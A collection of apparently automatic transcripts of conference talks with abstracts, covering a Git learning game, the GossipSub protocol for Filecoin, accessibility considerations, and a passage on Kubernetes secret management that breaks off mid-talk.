Hey everyone, on the screen to the left you can see a bleep track. I'm Blenri and we want to tell you about a game we're currently building which is about learning Git. What's our motivation? Well some of you already have some experience with Git probably, some of you won't have that and those of you who have some experience may be able to relate to the fact that Git is not easy to get into, right? It has some abstractions that are unusual and the command line interface is kind of inconsistent in some places. So it takes like some work to get into how Git works and how to use it, which is a pity because it's so super useful, right? And it's a core, it has like this very elegant structure of how it works. And like nowadays it's just everywhere you can like really benefit from using it and like when you work in teams to build software and other things. And we think that we want to make it easier for people to get into that of someone's, which is careers into software development or if some young people come into it, yeah we want to empower them basically to use it. That's why we are working on this. And our inspiration are puzzle games like Human Resource Machine, which in this case like teaches low level assembly programming. And yeah that was like the vision we had in mind to build something similar about Git. So this is what we're making. It's like it's open source of course, it's cross platform, you can download it for Linux, Mac and Windows. And as you will see, it's extremely interactive. You can like you have a visualization of how the Git repository looks like internally and you can like pretty directly manipulate it and see what's going on and learn about Git that way. And we also found that it's like very helpful in building some intuition for some other concepts involved like actually like intuitively understanding what the rebase is doing for example. And yeah even ourselves we found that helpful while building this game. So I think people who play this game will get the same effect. We are supported by the Prototype Fund, which is like a German funding program for open source projects. Sponsored by the German Federal Ministry of Education and Research and organized by the Open Knowledge Foundation and we're super glad about having the support. We're currently like four months into the project and we have until the end of February while we're like getting funding from them. And yeah we are really excited to show you what we came up with in the first four months. For building the game we're using the Godot game engine which is also like an open source game engine which we really enjoy and I think it's a pretty good fit for our project. It has a really nice community around it and yeah we're super happy with that. And yeah DeepTrack will show you some of the features in our game and how it does. Yeah let's take a look at some gameplay features and how everything works and looks. So our game is level based so we have a lot of little levels that show some nice concepts and this is the visualization of the Git repository. So the yellow notes you can see are commits and the blue tags are branch graphs in this case. And there's that neat little light blue guy, this is your persona basically and also your head pointer. So this is the main visualization that we use. It's a nice little mixture from physics based ordering and also we take a look at the Git log to get like the better view of the branching. And sometimes these branches can get a bit entangled so you can just grab them and wiggle around and entangle them if that happens. Yeah we thought a lot about how we could design a nice entry to Git that is also appealing to people that do not use a terminal or don't want to use a terminal. So we came up with cards and we took some inspiration from other card based games. So we have these nice little helper cards that are either one Git command or sometimes a combination of different Git commands and as you can see you can just pull them on different targets like commits and later on also maybe on files or refs etc. And this is the overall current look of the game so you have your visualization, your card deck now on the right side at the description of the level and you can see your level goals. These can also be multiple entries and below that is a file explorer and below that is a terminal where you can also type the commands. You don't have to use the cards, you can also type everything and if you solve levels only by typing and without using the cards you will get a neat extra little batch that shows that you're especially awesome but it's also totally fine that you can use the cards or use the cards as sort of like a cheat sheet so you can go back there and remember what that commit was. And yeah the file explorer also has a nice little text editor that you can use without leaving the game. So we thought also a lot about how we could have a nice visualization of the staging process and this is what we came up with. So you can see three different colored file symbols. One is like a shadow that is basically the version that is in your last commit and the white most on top file icon that is your current file in your working directory. So if you make a change you switch from icon A to icon B so your file has changed and this is why it's sort of levitated. And if you do a staging or if you stage that file the purple colored file icon will also raise up to your working directory file and that shows that this is currently staged and the shadow always stays the same because this is the last version that you had in your last commit. And yeah so I already told you about that terminal on the bottom right and the nice thing is that there's a real bash behind the terminal. So you can basically use all the commands that you are used to use if you are a more experienced user like you can go with touch and echo and do everything that you maybe want to do and also expect a bit more of the Git files if you're interested in that. But we also want to take care of new commas that they don't can do too much mischief in their own system. So we try to sandbox that at least a little bit and we also try to implement some of the comfort features like tap completion and suggestions and arrow up to get your last entry in the terminal. Yeah, using Git with other people is I think a super important feature so we can also use remotes like in this case on the bottom of the visualizations you can see your own repository and on the top is your friend's repository remote and yeah you can do push and pulls and everything that you also would like to do and that little green box that you just saw that these are our hints that we currently implemented in our last session so that the game can show you some more information. And yeah as the last point I would like to show you the level format because we would be super happy if you are interested in making your own cool levels and that's super easy. They are just text files basically and first you add all the fluff like the title, the description of the level and you can also set a congrats message that is shown when you solve a level and then there's also a list of cards. We predefined these cards so that they have nice icons and you can just choose which of the cards should be available in the level. Next there's a list of batch commands to set up your repository and don't worry the set up for this level removes the Git repository because it's a standard definition that one was created and in this case we want the user to create his own again with Git init so this is why we remove everything and yeah you can also set up remotes of course and then the most important part you want to have win conditions and you can add a list of conditions basically where you write your own tests and give them a speaking name so that the player knows what he has to do in the level. And yeah we hope you enjoy making own levels with our game. Blindri, back to you. Yeah we already do have some chapters which cover specific topics of Git like we have an intro for motivation, we talk about file manipulation, how to work with branches, how to do merges, index manipulation, stuff about remotes, stuff about rebase, some mistakes you might make and how to recover from them, yeah a long chapter about low level stuff and some sandboxes and like that's our current status. I think like for the future we have planned to like add even more even more content to that for example we would be really excited to do a chapter about sub modules especially to understand that ourselves better and to be able to explain it to people how they work. Yeah we do have a little story set up in some of these levels which have the theme of time travel because we thought it might be a good analogy like when you check out commits then you go back in time and go back to that version and then like files are objects in the world that you can manipulate and then solve little puzzles or help people with their problems they are having and we're also really excited to add something like a solar punk background world to that so like the synergy of technology and nature and how they can coexist because we think that's a nice aesthetic and we would love to have that in the game. That's one of the next steps and yeah I guess we will do a lot of polishing still. What you saw in the videos are kind of like plays all the graphics and we plan to go over them and polish them a bit more and also add something like more sound effects a friend has offered to do some background music and yeah that's planned for the future. If you are new to Git what will you be able to get out of the game? We think it's a pretty fun introduction to Git. We had some playtesting sessions recently with people who are completely new to Git and didn't know anything about it and we think they really enjoyed themselves exploring these concepts and like the superpowers which Git gives you and the game as I said helps you build a bit of an intuitive understanding for several things like what exactly merging as and how it works and what happens when you stage or unstage files and yeah because we have this real Git repository attached it gives you some practical knowledge that you can directly use in in real projects after that. And if you already know Git and are more advanced user already what can you get out of it? Well you can take a look at the later chapters which deal with more advanced features like Git bisect to find some bugs in the past or sometimes it might be a good idea to patch things up with Git Replace. I didn't know about that feature before but you can take a look at that and especially if you try to build your own levels we think the game will help you to get like a deep understanding of Git's internals like understanding what's inside of the.git folder and what this like distributed graph theory tree model that the XKCD is talking about actually means. So yeah what are we looking for? We would love for you to reach out if any of this resonated with you especially if you are someone who is interested in like using this game to teach Git to other people like if you are in education or in some sort of a mentoring role. And also if you just want to test the game and help find some problems with it no matter what experience level you are at definitely get in touch. And yeah as we mentioned if you are like feel now excited to build your own level sequence using this game you can do that at the URL. Here currently showing we have all the information you need like links to the GitHub repo and to documentation. Check that out. We are bleeptrack and blinwe everywhere like on Twitter and on Patreon and stuff and there's also an email address for quick access. And yeah that's all we got. Thanks for listening. Have a nice first time. Bye. Bye. Bye. So it was very nice talk. So let's go over the questions. So when creating the game did you know about learninggitbranching.js.org? Yeah we knew about it and we did actually a lot of research about some Git learning games and we also found some older ones that were not still active anymore. We also checked out a lot of other coding learning games in general and yeah. One of the advantages I guess is having like what we missed about the learninggitbranching is having a real Git behind it right. The kind of like we implement the Git command line interface and then target it to specific operations like yeah making branches, rebasing stuff and stuff. And yeah with our game we like wanted to have a real Git binary behind it where it can actually do everything. And I think that also fits to the question why we didn't use or why we don't have a web version currently because we that is the trade off. We were thinking about having a web version which is a lot more accessible and also having a real Git repository. And yeah as we were building with Godot we could do exports for web versions but that would break all of our Git stuff. So that's currently the trade off we're having. We have thought about having like a virtual machine in the browser that runs Linux and has a Git installed. If anyone of you is really into that you could definitely look helping make that happen and having a web version would be awesome. Yeah but currently it's like a binary you can download for Linux, Mac and Windows. System requirements are not really high. I think the graphics are very basic and two dimensional. At least we tried it on a super low requirement old Windows tablet and it also ran great. Okay moving to the next question. Did you decide for a dynamic physical balance tree for a special reason? I personally would prefer a static tree in a traceable slash predictable look and feel instead of dangling branches. Oh yeah that's a good point. We were looking at both options and in the end we went for a dynamic like a physically simulated tree because it was easier for us to implement eventually. And we would be interested in your feedback like Simon if you actually want to try the game and notice that it really is a hindrance in some cases. Definitely get in touch and we can maybe make it happen to have a static layout. Also quick note we will be cut off automatically after the slot ends so if you're interested in discussing this more definitely come join our talk room that will be posted by a bot chat later. Yeah. Thank you.
Git is ubiquitous these days - but it has a pretty steep learning curve! To help people learn how to use it efficiently and intuitively, we're developing an interactive, open-source learning game! It makes heavy use of visualizations, features an (optional) graphical "playing card" interface, and uses real Git repositories under the hood! Storywise, you're a time agent in training, and learn all about how to use your time machine to help people solve their problems. In this talk, we want to introduce you to how the game works, and show you our current progress. We're using the Godot engine, and have a simple, extensible level format based on Bash scripts, which you can use to build your own levels! We want to accomodate both people who are new to Git and the command line, as well as advanced users who are interested in learning more about what's going on under the hood. We'll share what we learned in our playtest sessions, and what's next.
10.5446/52846 (DOI)
Hello everyone, welcome to this talk on GossipSub. I'm very excited to be here. My name is Yanis, I'm a research scientist at Protocol Labs Research and the work I'm going to present is a collaboration between several teams including the Filecoin team, LibP2Pia team and the Resilient Networks Lab which is part of Protocol Labs Research. So today's talk is on GossipSub, a secure message propagation protocol for the Filecoin blockchain. And before I go into the details of GossipSub, I would like to spend a few minutes talking about Filecoin, what it is and what it aspires to become. Here is an outline of my talk. I'm going to introduce the Filecoin network and this is where our talk is going to focus today but it is worth mentioning that GossipSub is also deployed and currently in use in the Ethereum 2 blockchain. Then I'm going to jump into discussing how important message propagation protocols are for permissionless blockchain networks. I'm going to give a brief outline of the GossipSub protocol going into details of some of its parts as time permits and finally I'm going to give you all the details of our extensive evaluation that we did on GossipSub in adversarial environments. So Filecoin is a decentralized storage network for the web3 and not only. It's a peer-to-peer incentivized and permissionless network where users can earn Filecoin by contributing to the network with extra storage capacity. In the Filecoin network there are three roles. There are the clients that want to hire the network to store their data and pay in Filecoin. There are the miners that store data for the network, contribute storage capacity and store data for the network and its clients and then are rewarded in Filecoin as a reward for their contribution to the network. Finally there is the network that organizes the work verifies that no one is misbehaving and rewards miners with Filecoin. This is a more graphic representation of the system where we have clients that want storage, miners that provide storage and the network that is an intermediary that connects the two. The clients are paying Filecoin and their agreeing deals with miners to store their data. Miners what they have to do is they have to store the data and provide proofs that they are indeed storing the data and they're not misbehaving by deleting the data and allocating the storage space to something else. Finally the network is taking those proofs and it's making sure that no one is misbehaving and if they find that no one is misbehaving then they are rewarding miners with Filecoin. The network is trustless and permissionless in the sense that the client do not have to trust the miners to store their data then it's the network's job and the algorithmics behind it to do that and it's also permissionless from the point of view that anyone can start a miner and contribute to the network. Now to do all this what the Filecoin network uses is a blockchain. The blockchain is used as a currency, it is used as in order to settle input market orders and most importantly it is used for proofs. A proof is a verifiable record of behaviors in the network and through this proof the network can make sure that basically the miners are keeping up the promise of the deals that they have agreed with clients. Now what is GossipSub and how does it fit in the big picture? GossipSub is a PubSub protocol designed for efficiency and resilience against malicious behaviors in permissionless blockchain environments. Permissionless blockchains are open for anyone to join. There is no pre-authentication or access control which further means that pretty much anyone can join the network and attempt to attack or disrupt the operation of the network. This is the problem that we're trying to address by having a secure message propagation protocol. Now in blockchain systems it is very important to avoid network fragmentation and forks. The network should have to reach consensus through the verification process through proofs and it's also very important as we know to keep nodes in sync so nodes every node every miner in the network needs to have the same view of the state of the network that's when the blockchain can progress basically and add more blocks to the network. So a message propagation protocol is needed so that messages the new blocks that are produced by miners in the network can propagate to every node in the network to keep them in sync. Now in the file calling there is an important deadline that we need to keep in mind and this is at six seconds. So within six seconds of a block being produced it needs to propagate and reach all other nodes in the network so that in the next round they can start mining the new block on the correct state. So on the correct state of the blockchain up to the previous period. So let's keep this as a takeaway point the six seconds because it's an important thing for what our protocol can achieve. Now we've gone back and we've seen with research the vast literature that exists in the area of PubSub protocols and there has been some great research coming around that has happened in the past. What we have seen though is that security has not been tightly integrated in the protocol but rather in past PubSub systems it has been kind of outsourced at the application layer. So there is some in most cases centralized entity that performs security measures that's access control and all that. So what we did is that we designed some attacks to the network so that we're sure that while PubSub propagates messages in the network it can inherently identify malicious behavior and stop like get the nodes, the malicious nodes, the nodes with malicious behavior out of the network. Of course we started with simple attacks such as the civil attack which is a very common attack in peer-to-peer networks but we weren't on to investigate much more sophisticated attacks such as the cold boot attack and I'm going to explain what it is later on. So I'm going to spend a few minutes talking about what GossipSub actually is and the main construction in GossipSub is the mesh. So every node in the network is connected to a number of other nodes which is the degree in this case 5 and in this case node A is connected to five other nodes. This means that when A produces a new message, a new block, it's going to immediately broadcast it to all those nodes. Those nodes in turn are going to take the message and broadcast it to their own local mesh in the system. So in this case, we're going to do that in the system. So by doing that, the messages are propagating throughout the mesh and that's how the main propagation is done. Now we talked about this degree and there is a high threshold and a low threshold to this. The high threshold is when the node finds out that there are more nodes connected, more other peers connected to it and when these go above D high, the upper threshold, the node has to prune some connections and when it falls below the D low, the lower threshold, it has to graft some new nodes. So that's how we settle the degree of the network. Then we have GossipDissemination and with GossipDissemination, what we do is instead of propagating whole messages, which is what happens in the mesh constructions, in the mesh construction where messages are propagated immediately to all nodes, here we only propagate metadata and this happens every one second and what we want to do is avoid the situation where all our connections are dominated by civil nodes and what we want to do is reach out to other nodes and bypass any of my issues nodes attached to our peer. Now there is a trade-off between the mesh degree and GossipDissemination. The higher the mesh, the degree of the mesh, the more the traffic, obviously, but the faster a message is propagating. On the other hand, when we propagate more Gossip, more Gossip but have a lower degree for the mesh, we have less traffic in the network but messages propagate slower. So we need to hit the right balance between these two. Now we went on and tried to have, integrate some security considerations on top of GossipDissemination. What we did is we came up with a score function. The score function is a function that takes into account several parameters for good or bad behavior and every node in the network is keeping a score for all other peers it is connected to. So for example, when we see that a message is delivered to our peer from a neighbor and we're receiving this for the first time, then this means that this node is behaving correctly and we increase the score that we have for this node because it's not trying to delay messages or degrade the performance of the network. On the opposite side, when we have an invalid message that is delivered to our node, then we score the peer where we receive this message from with, we decrease the score or we value it negatively because the node is potentially trying to spam the network with invalid messages. There are several other parameters that we integrate into the score function. Some of them are presented here. It is important to note that nodes do not share this score with other peers, they keep it for themselves. And what do they need it for? We need it for some mitigation strategies. So there is the control mesh maintenance and what this is, is the grafting and pruning of new nodes that I have mentioned before, which we now do based on the score function. So when we want to graph new nodes because our D, the degree of our node has gone to a low value, we are only picking the highest scoring nodes of our neighbors. This means that our mesh, our immediate mesh, is formed of honest nodes only and we kick out the malicious nodes. When a node has got a low score or a negative score, then we prune this node immediately. This eventually is kicking out all the bodily behaving peers from our immediate mesh. We have some other strategies that I don't have time to go through right now. Just mentioned flood publishing as a very quick example is when a node is publishing a message. The first hope that it is sending to, it is to every other node it has in its connection list. So not only in the immediate mesh, but every other period nodes. And this is, of course, to avoid the situation where all the mesh connections are malicious users, seabills that want to silence the node. And with this way, we want to bypass malicious nodes and reach other nodes in the network. We tested, we have carried out a very extensive evaluation setup. We used test ground, which is an emulation platform that we have deployed on AWS. We've run more than 5000 VMs on AWS. We have considered honest to malicious peers up to a ratio of 1 to 20. Actually, this goes more, but these are the main test cases. Our metrics was where the deadline that I mentioned before, the six seconds. So every message needs to reach every other node within six seconds. And of course, we want to have zero packet loss. We compare the performance of GossipSum with the message propagation protocols of Bitcoin and Ethereum 1, where in Bitcoin, every node is, every miner is opening roughly 133 connections and effectively floods all the 133 connections when a new message is produced. In Ethereum 1, in contrast, what we have is the network is using a protocol where every node connects to the square root of N, where N is the size of the network. So with current network sizes, when we did the study, that was about 33 connections. And here, what I would like to go a little bit deeper on is a few representative results. So here is a network-wide Eclipse attack, where on the Y-axis, we have the CDF of the nodes in the network. So when is a message reaching this, the percentage of nodes that receive the message. And on the X-axis, we have the message propagation latency. So how long did it take to reach the specific CDF that we have on the Y-axis? We see that GossipSum is basically unaffected by the attack and delivers the message to every node in the network in less than 200 milliseconds. In contrast, Ethereum 1, for example, is totally devastated by the attack and takes more than 10 seconds to propagate the message to all of the network. Obviously, this is something that would completely break the network, especially in the Filecoin case, because we have this six-second deadline that I mentioned earlier. Now, going to the cold boot attack, which is a more sophisticated attack and assumes that when nodes join the network at network launch, the network is dominated by symbols, and therefore nodes go and connect to symbols directly. This is a very nasty attack, not necessarily very realistic, but stretches the protocol to its limits so that we see what happens. What we found was that GossipSum is a little bit affected in this case, and the message propagation goes to 1.2 seconds, but again, we see that all other protocols, including Bitcoin, take much, much longer. Another interesting result from the same scenario is how fast can GossipSum recover the mesh? So we have here the orange nodes that we see in the beginning of the experiment dominate the mesh, and we see that honest nodes, the blue lines, start coming in progressively. We see that within less than 1.5 minutes, the network has completely recovered, and most, the majority of nodes in the nodes mesh is now dominated by honest nodes as opposed to civil nodes. So this is a healthy situation for the network because messages can propagate, and nodes do not get silenced. We have done many, many more evaluations. We have hundreds of test cases that we are going to make publicly available so that others can reproduce the results. Of course, our test setup is running the production code, which is open source also, and leaves on GitHub. So as a summary, the Filecoin network is an exciting, first of its kind, decentralized storage network, and GossipSum is one protocol, the first of its kind, again, to integrate security measures at the protocol layer in order to enhance and support permissionless peer-to-peer networks. We think that there is going to be much more research and much more development coming around in this area as the momentum of Web3 and decentralized technologies emerge. And we think this is a very good first step. I have put some links here on the right-hand side on Filecoin, the website, the blog, the specification, but also GossipSum, the specification of the protocol, as well as a preprint of a paper. So looking forward to more questions and collaborations. Thank you very much and see you soon.
Permissionless blockchain environments necessitate the use of a fast and attack-resilient message propagation protocol for Block and Transaction messages to keep nodes synchronised and avoid forks. We present GossipSub, a gossip-based pubsub protocol, which, in contrast to past pubsub protocols, incorporates resilience against a wide spectrum of attacks. Firstly, GossipSub's mesh construction implements an eager push model keeps the fan-out of the pubsub delivery low and balances excessive bandwidth consumption and fast message propagation throughout the mesh. Secondly, through gossip dissemination, GossipSub realises a lazy-pull model to reach nodes far-away or outside the mesh. Thirdly, through constant observation, nodes maintain a score profile for the peers they are connected to, allowing them to choose the most well-behaved nodes to include in the mesh. Finally, and most importantly, a number of tailor-made mitigation strategies designed specifically for these three components make GossipSub resilient against the most challenging Sybil-based attacks. We test GossipSub in a testbed environment involving more than 5000 VM nodes deployed on AWS and show that it stays immune to all considered attacks. GossipSub is currently being integrated as the main messaging layer protocol in the Filecoin and the Ethereum 2.0 (ETH2.0) blockchains. In this talk we will go through the design details of the GossipSub protocol, discuss it's novel points and present a comprehensive performance evaluation study. The talk will serve as a great forum to answer questions and justify the choice of using GossipSub in two of the biggest blockchain networks, namely the Filecoin and ETH2.0 networks.
10.5446/52847 (DOI)
Hi, and welcome to accessibility considerations. My name is Marcia Wilber, and today I'll be presenting this short lightning talk with my daughter Justina, or Tina. Just as a short intro, I am a developer, Debian. I also do some AIoT development. I like to tinker. I've been a part of this community for about 20 years now, and I'm very community focused. I'm a journalist, a copyright activist, and a chixor. So I'm excited to be able to present this information about accessibility today, and let's get started. I'm going to turn the time over to Tina for a little bit about web accessibility. Hi, my name is Justina Wilber. I go by Tina. I have mixed connective tissue disease, fibromyalgia, bilateral carpal tunnel, renaughts, and degenerative disc disease. We are going to talk about web accessibility considerations for web content. Links. The text needs to be consistent with descriptive text. Same text used for links that go to the same destination. The link title attribute, the purpose is to offer additional information about the link. Typically, these are less than 80 characters, rarely over 60 characters, but short of the link title, it's more recommended. Web forms. If you use web forms, remember to have a real label, instructions placed before the form, and clear fields. It is clear which field an error message is referring to. Clear errors in how to correct. Color and contrast. Text color versus background color. Make background colors lighter or font colors darker, so it's easier to see. There are a few tools to check against color contrast in websites. Just create or improve some free and open software for contrast auditing. Keyboard only access. I do this a lot because I have a hard time gripping a mouse and using a mouse. I tend to use the tab key to tab over, but sometimes it doesn't work on certain websites. We would like to be able to use the tab key alone, in a logical order. You can set the links up and buttons with the enter key to create the best end user experience possible. You can move inside interactive items with an arrow tab. There's a skip to content link. The first thing you tab onto the page. There's drop down menus and mouse overs to work with tabs or arrows. That is it. So I want to thank Tina for that information about web accessibility and move on to other considerations. We'll start with video. To include audio and closed caption. So moving on to IoT and hardware. One of the things I wanted to discuss was the IP address that is sometimes located on the module outside of the device or unit. Is there audio also? Is there an alternative way for someone to see that display or get that information from the display? Because that would be very useful. Also during setup, you know, if it's too physically demanding, that could be difficult for some users. So remember ease of use, less setup, more bring up. And to include clear instructions, both text and images. So just like a recap here, make sure there are audio and visual considerations, ease of use, and also color blind considerations such as the green LED, right? Remember to design for accessibility. Who is the customer? What is the situation? How can we include everyone? And then of course, now is a good time to focus on accessibility. Again, a recap. Is there visual only display? Or is there audio also? Is there both? Is the setup demanding? Is the software easy to use and accessible friendly? And are the instructions clear and accessible friendly? So to sum it up. And let's go back to the glamorous battle, oh and look at this. I have to guess what, as none of the autistic groups here reflect baked science. Art街, creating a scripting 100 million- paradoxical people made a mistake. This overused and so the ugly sources show what happens if they take them and ignore their fixed layer of information. Okay, accessibility, physical reactions and seizures. So there can be physical reactions due to video and animations as well as patterns. So if you're doing video and animation, avoid blinks, flashes, anything 3-30 Hz. Avoid patterns with light and dark contrast, stripes and bars, and some of the reactions are as discomfort all the way up to seizure. So keep these things into consideration. Then reduce the risk by avoiding firework like videos or high flash rates, strobe lights is another. Avoid black and white patterns and anything with sunlight coming through the blinds or trees. If you're working with virtual reality, then you know it really stimulates your senses. And the images flash quickly, your eyes more focused on the field of view, and it's a possibility there could be a seizure triggered. So there's more current information about that at the Epilepsy Society website if you want to go check that out. And again another recap, do you have flickers, flashes, patterns, videos, sunlight, are you using VR? Okay, so this next section is about writing for accessibility in graphics and mobile. So when you write for accessibility, keep an accessibility in mind, you want to be clear and concise. You want to avoid using location such as in the upper right hand corner at the bottom of the page because when you're using a screen reader, I don't really think there's, you know, that doesn't, it's not kind of relevant, doesn't make a lot of sense, right? You know what I'm saying? And then with colors, you know, something like click the blue button, but there's three buttons. So how do they know which one's blue, if they're color blind or not able to see? So you know, keep these things into consideration. If you're working on a hardware project and you notice there are only like different colored LEDs for visual cues like yellow for warning, green for go, you might want to mention it to the engineering team and you know, just something very FYI like, hey, by the way, you know, I noticed visual items and cues, are there going to be any audio or alternative ways for people to get that information? Okay, when writing for accessibility, remember to use, you know, clear instructions, simplified language, colors and visual location. Now you might say, well, how can I have details and simplified language? Just make it easy to read and, you know, avoid the colors and visual location. So infographics are interesting because they're images, right? And how does someone make that more accessible? Well, you can add audio like with the image. So maybe like collection or like container that has, you know, that information. But I like to use Steghide and include the transcript. So if you want to learn more about Steghide, it's really interesting. You can embed the file with the image and you can do it with audio as well. So it could be an ultimate way of including information. As far as mobile applications, well, if you're using mobile apps, you know, if you have some, you know, there are some accessibility settings built in for enlargement, contrast, zoom and magnification. And during my research, I discovered that Google has an accessibility app scanner. Now here's the question. Why does Google have one and we don't? This is an amazing idea, right? Like we could have one just for desktop apps too. It checks different items for accessibility, friendliness. Anyways, it checks type, you know, the types that checks is like recording snapshots and secure windows, dialogues, and it scans it, it submits the results and then even has an editor for contrast, stores the results, share the results. I mean, it would be, I don't think it would be that difficult to, you know, write a script and throw a little YAD front on it or something. And here's the conclusion. Okay. So basically with accessibility, you can really pave the path to positivity, right? A little closer to the heart. And these are just recommendations and guidance, not enforceable, not something that, you know, needs to be in compliance or anything. Just goodwill. And starting out as community, maybe like for me it was about 20 something years ago. Like many of our projects seem more people focused, right? Like how can we create a tool, utility, or app that makes it easier for people to do this or automate this, you know? And let's get back to that, right? And pave a path of positivity for the future. If you have any questions, if you need to reach out to myself, Martina, you can find us online. IRC, you know, all the regular channels. But if you really need some assistance with your project and you don't know where to start with accessibility, you just want to, you know, talk it out or chat it out for a little bit and see what we can do for you. We do have volunteers and we do have information on our website, ganuelinux.io. No charge, help the community, help society, help our applications improve. We're all about that. So, thanks. Have a great day. Thank you. Marsha, thank you very much for the talk. And thank you for joining us for the Q&A session today. Thank you. So we have already received several questions. The first item is from Sylvia and Sylvia asks, even while trying to keep best practices in mind, it is of course possible to miss the stuff. Do you have any tips on making it easy as possible for people to report accessibility-related issues for open source or free software projects? Is GitLab's issue tracker okay or is it not very accessible? What is your opinion on that? So I can give you my opinion on GitLab but maybe people don't like it. It's a Microsoft product. I don't use it. So, but I could look into it and see how accessible it is. Yeah, I don't really have that answer as far as GitHub and proprietary platforms are concerned, but they might have some information on GitHub about accessibility. Right. The next question is from Sebastian and Sebastian is asking, do you find that better accessibility has for a part the same focus as keyboard enthusiasts? For example, use the mouse as little as possible just to make it also work properly just with the keyboard. So being able to use the keyboard is very important for people not just who have visual issues but who also have limited mobility. I saw someone posted something from Mozilla about accessibility. I thought that's a great resource that you can look to. Yeah, I would say keyboard definitely helps everyone. Thank you, Marcia. Sebastian has asked one more question. I have not used open dyslexic, but we do have dyslexics in our family and I definitely want to look into that. And thank you for that. I don't know what happened to Praveen, but I'm going to say this. I'm looking at some of the questions. So yes, I did subtitles. No, I did not see where on FOSDOM we can import SRT or subtitle files. Let's see. As far as getting back to that limited mobility question, it's not just one hand usage. Some people have arthritis in both hands or even we know some quadriplegics. We had a member in my club whose father had Parkinson's. So there's a lot of different limited mobility issues. The talk ends in one minute.
Accessibility considerations for hardware, software and documentation are presented. The presenters are Marcia K Wilbur (developer) and her daughter, Justina Wilbur. Justina was diagnosed several years ago with mixed connective tissue disorder (MS, Lupus, Rheumatoid Arthritis) and has some insights on additional areas for accessibility considerations in software and documentation. Web considerations and recommendations for future tools will be discussed.
10.5446/52848 (DOI)
you Welcome to FuzzDem 2021. This talk is about secret management within the context of communities. You will not have many console configuration outputs, but more on the overview of what is currently available to manage your precious secrets with a communities platform. Unless you are watching a replay, note that you can interact with the audience and I during this talk using the chat feature. Quick intro about myself. You can call me Ron. That's going to be easier for everyone. I have been working within the storage industry for almost 10 years to make sure data are accessible and secure in all the different meanings of that last word. Then for the last seven years, I have moved to a consulting role helping customers with their automation and container journey. Why secret within communities? There are a couple of important key architecture points to take into consideration from a communities deployment perspective. These needs to be addressed before and during implementation and also later on when maintaining the platform. There's topics are linked to networking, storage, security, along the most important ones. Networking is mostly related to old legacy concerns and concepts, usually not applying anymore to communities, but creating useless extra layers of complexity within the infrastructure unless you embrace a full software defined networking. Storage is one struggle in many implementation because we need storage, right? Especially in the context of containers. Well, until you discover what it means to have a non-persistent data set in a container and the joy of the famous oops, that goes before and after the question, where is the backup? The last bit is security, which can be anything and a real challenge to discuss with the security team, but most of the time is also victim of the old legacy governance. While speaking about security, let's zoom in on secret management. So what is a secret? Well, from a generic definition, this is something that you don't want to share with anyone. If you do, this is not a secret anymore, it just became a news that will spread around. Within the IT industry, this is a configuration element that could allow you to have access to restricted resource like a database, an API service, or a device like a server. And this applies to communities also. One interesting element from a community's project standpoint is that the design reference for secret management is from 2017, referencing a set of options to handle secrets that did not really change so far. So how do I deal with secrets from a community standpoint? Well, there's three different ways to do it. One would be to keep the password within the parts. Second one would be to use the internal and community secret resource management. And the last one would be to use an external solution. Let's have a look at those. So within containers, okay, so having a password in containers might be a solution that allows you to do some quick testing, quick hacking. However, this is not a secure approach nor a scalable one, considering that part of the deployment strategy would be to maintain current passwords for different services within containers, either from deployment definition or within the container image itself. Whatever, how it would be done, this is a very dangerous path leading to disaster. I can share you a very interesting situation where a customer publishes a container image on Docker Hub with sensitive information related to their company. Remember the oops, well, this is a big oops. The second way is to use the communities internals. Indeed, communities is offering an option to store secrets within a TCD. This might sound quite appealing, considering that this is an onboard solution being the closest to the workloads that would use secrets. This will also remove all the craziness of storing password with deployment configuration or within a container image. Although there's a couple of things to know. First, the secret will not be encrypted. It will be encoded in base 64, not really secure. By default, many communities the solution comes with an encrypted TCD. Anyone with communities access can retrieve the secrets. Also, secrets will live within the target cluster on which you deployed that specific secret and will not fit a multi-cluster scenario. So, is it a potential solution? Well, the answer to this question is still yes, if you consider the following recommendation. First, enable encryption at rest for TCD. Second, enable role-based access control rules, famous RBAC, to restrict reading and writing secrets on the platform. And last, a personal recommendation, do not store any secrets for external services. Like a database. The reason for the last personal recommendation is about containing a potential leak. If it will happen, it will only concern a very reduced set of data within a specific cluster that will definitely limit potential damages. Well, how does it look like? Well, creating secrets from a Kubernetes perspective can be done in multiple ways. One of them is by using a secret resource file and applying it via Cube CTL, Cube Control. This is what you can see on the screen on the left side. So, we're using the KEMN Cube CTL to generate the manifest for a secret. At that stage, we can apply that manifest to Kubernetes itself so that it's available for parts. On the left side, you have an overview of how to call the secrets, the secrets that you just registered from a part perspective. By using one of the methods, which is the environment variables that you can see here being secret underscore username or N, actually, secret underscore password. So, if you're thinking about GitOps, this would be a perfect example, except that you would save your secrets within Git, meaning that you just publish your secret in Kleatex or base64 encoded for anyone having access to your Git repository. So, that you can try this at home quite easily using MinCube, for example, or any other similar lightweight Kubernetes distribution. So, the last one is about using an external solution. This option is about having a totally independent solution that would run outside or inside Kubernetes or even in an hybrid mode. Such a decision will impact the actual availability of the solution towards single or multiple clusters or even being used by non-Jubinities workloads. Let's have a look at those solutions. From that list, which refer to Ashikovold, CyberR, Conjurer, Kiwis, SealSecrets and ExternalSecrets, I will have no look at the Ashikovold and CyberR solution, as they have quite a good amount of collaterals being a product for enterprise proposals. However, I would like to give a shout out to two projects, being SealSecrets from Bitnami and ExternalSecrets from Goodaddy. I believe these are quite mature and interesting options when looking into an open source solution. Remember earlier when discussing about using a resource file to be saved within a Git repo, which was not a good idea, actually, because the secret would be publicly available in clear or base64 encoded text. Well, this is where SealSecrets from Bitnami embraces the GitHub concept and solves the clear text issue. SealSecrets is based on the client server approach, having a controller deployed within the Kubernetes cluster, and having a CLI tool called kubesil on the client side. It introduces one way encrypted secrets that can be created by anyone, but can only be decrypted by the controller running on the Kubernetes cluster. This is based on the principle of public key cryptography involving a public and a private key. Let's have a look at it. So nothing too much different considering the previous example. On the left side, we have exactly the same the manifest, the creation of the manifest, and then we introduce a kubesil, which we'll check on the controller running on the Kubernetes platform for the certificate and encrypt the data. When the data is encrypted, then we can apply that manifest towards the cluster. And at that stage, we have the output from the encrypted payload, which is on the right side. Not too much different than what we have on the left side, except that this time it's not base64 anymore. It's a real encryption. The last approach is to use external secret from GoDaddy. It provides an API extension to Kubernetes by adding the concept of external secrets or an API perspective using custom resource definition along with an embedded controller within the Kubernetes cluster, a bit like the seal secret. Assuming that 1kms is available internally, the idea is to leverage that existing kms within your infrastructure instead of reinventing the wheel. Doing so will avoid to retrieve secrets and exposing them to the world during the processing time to make them available within the Kubernetes cluster. A controller is deployed 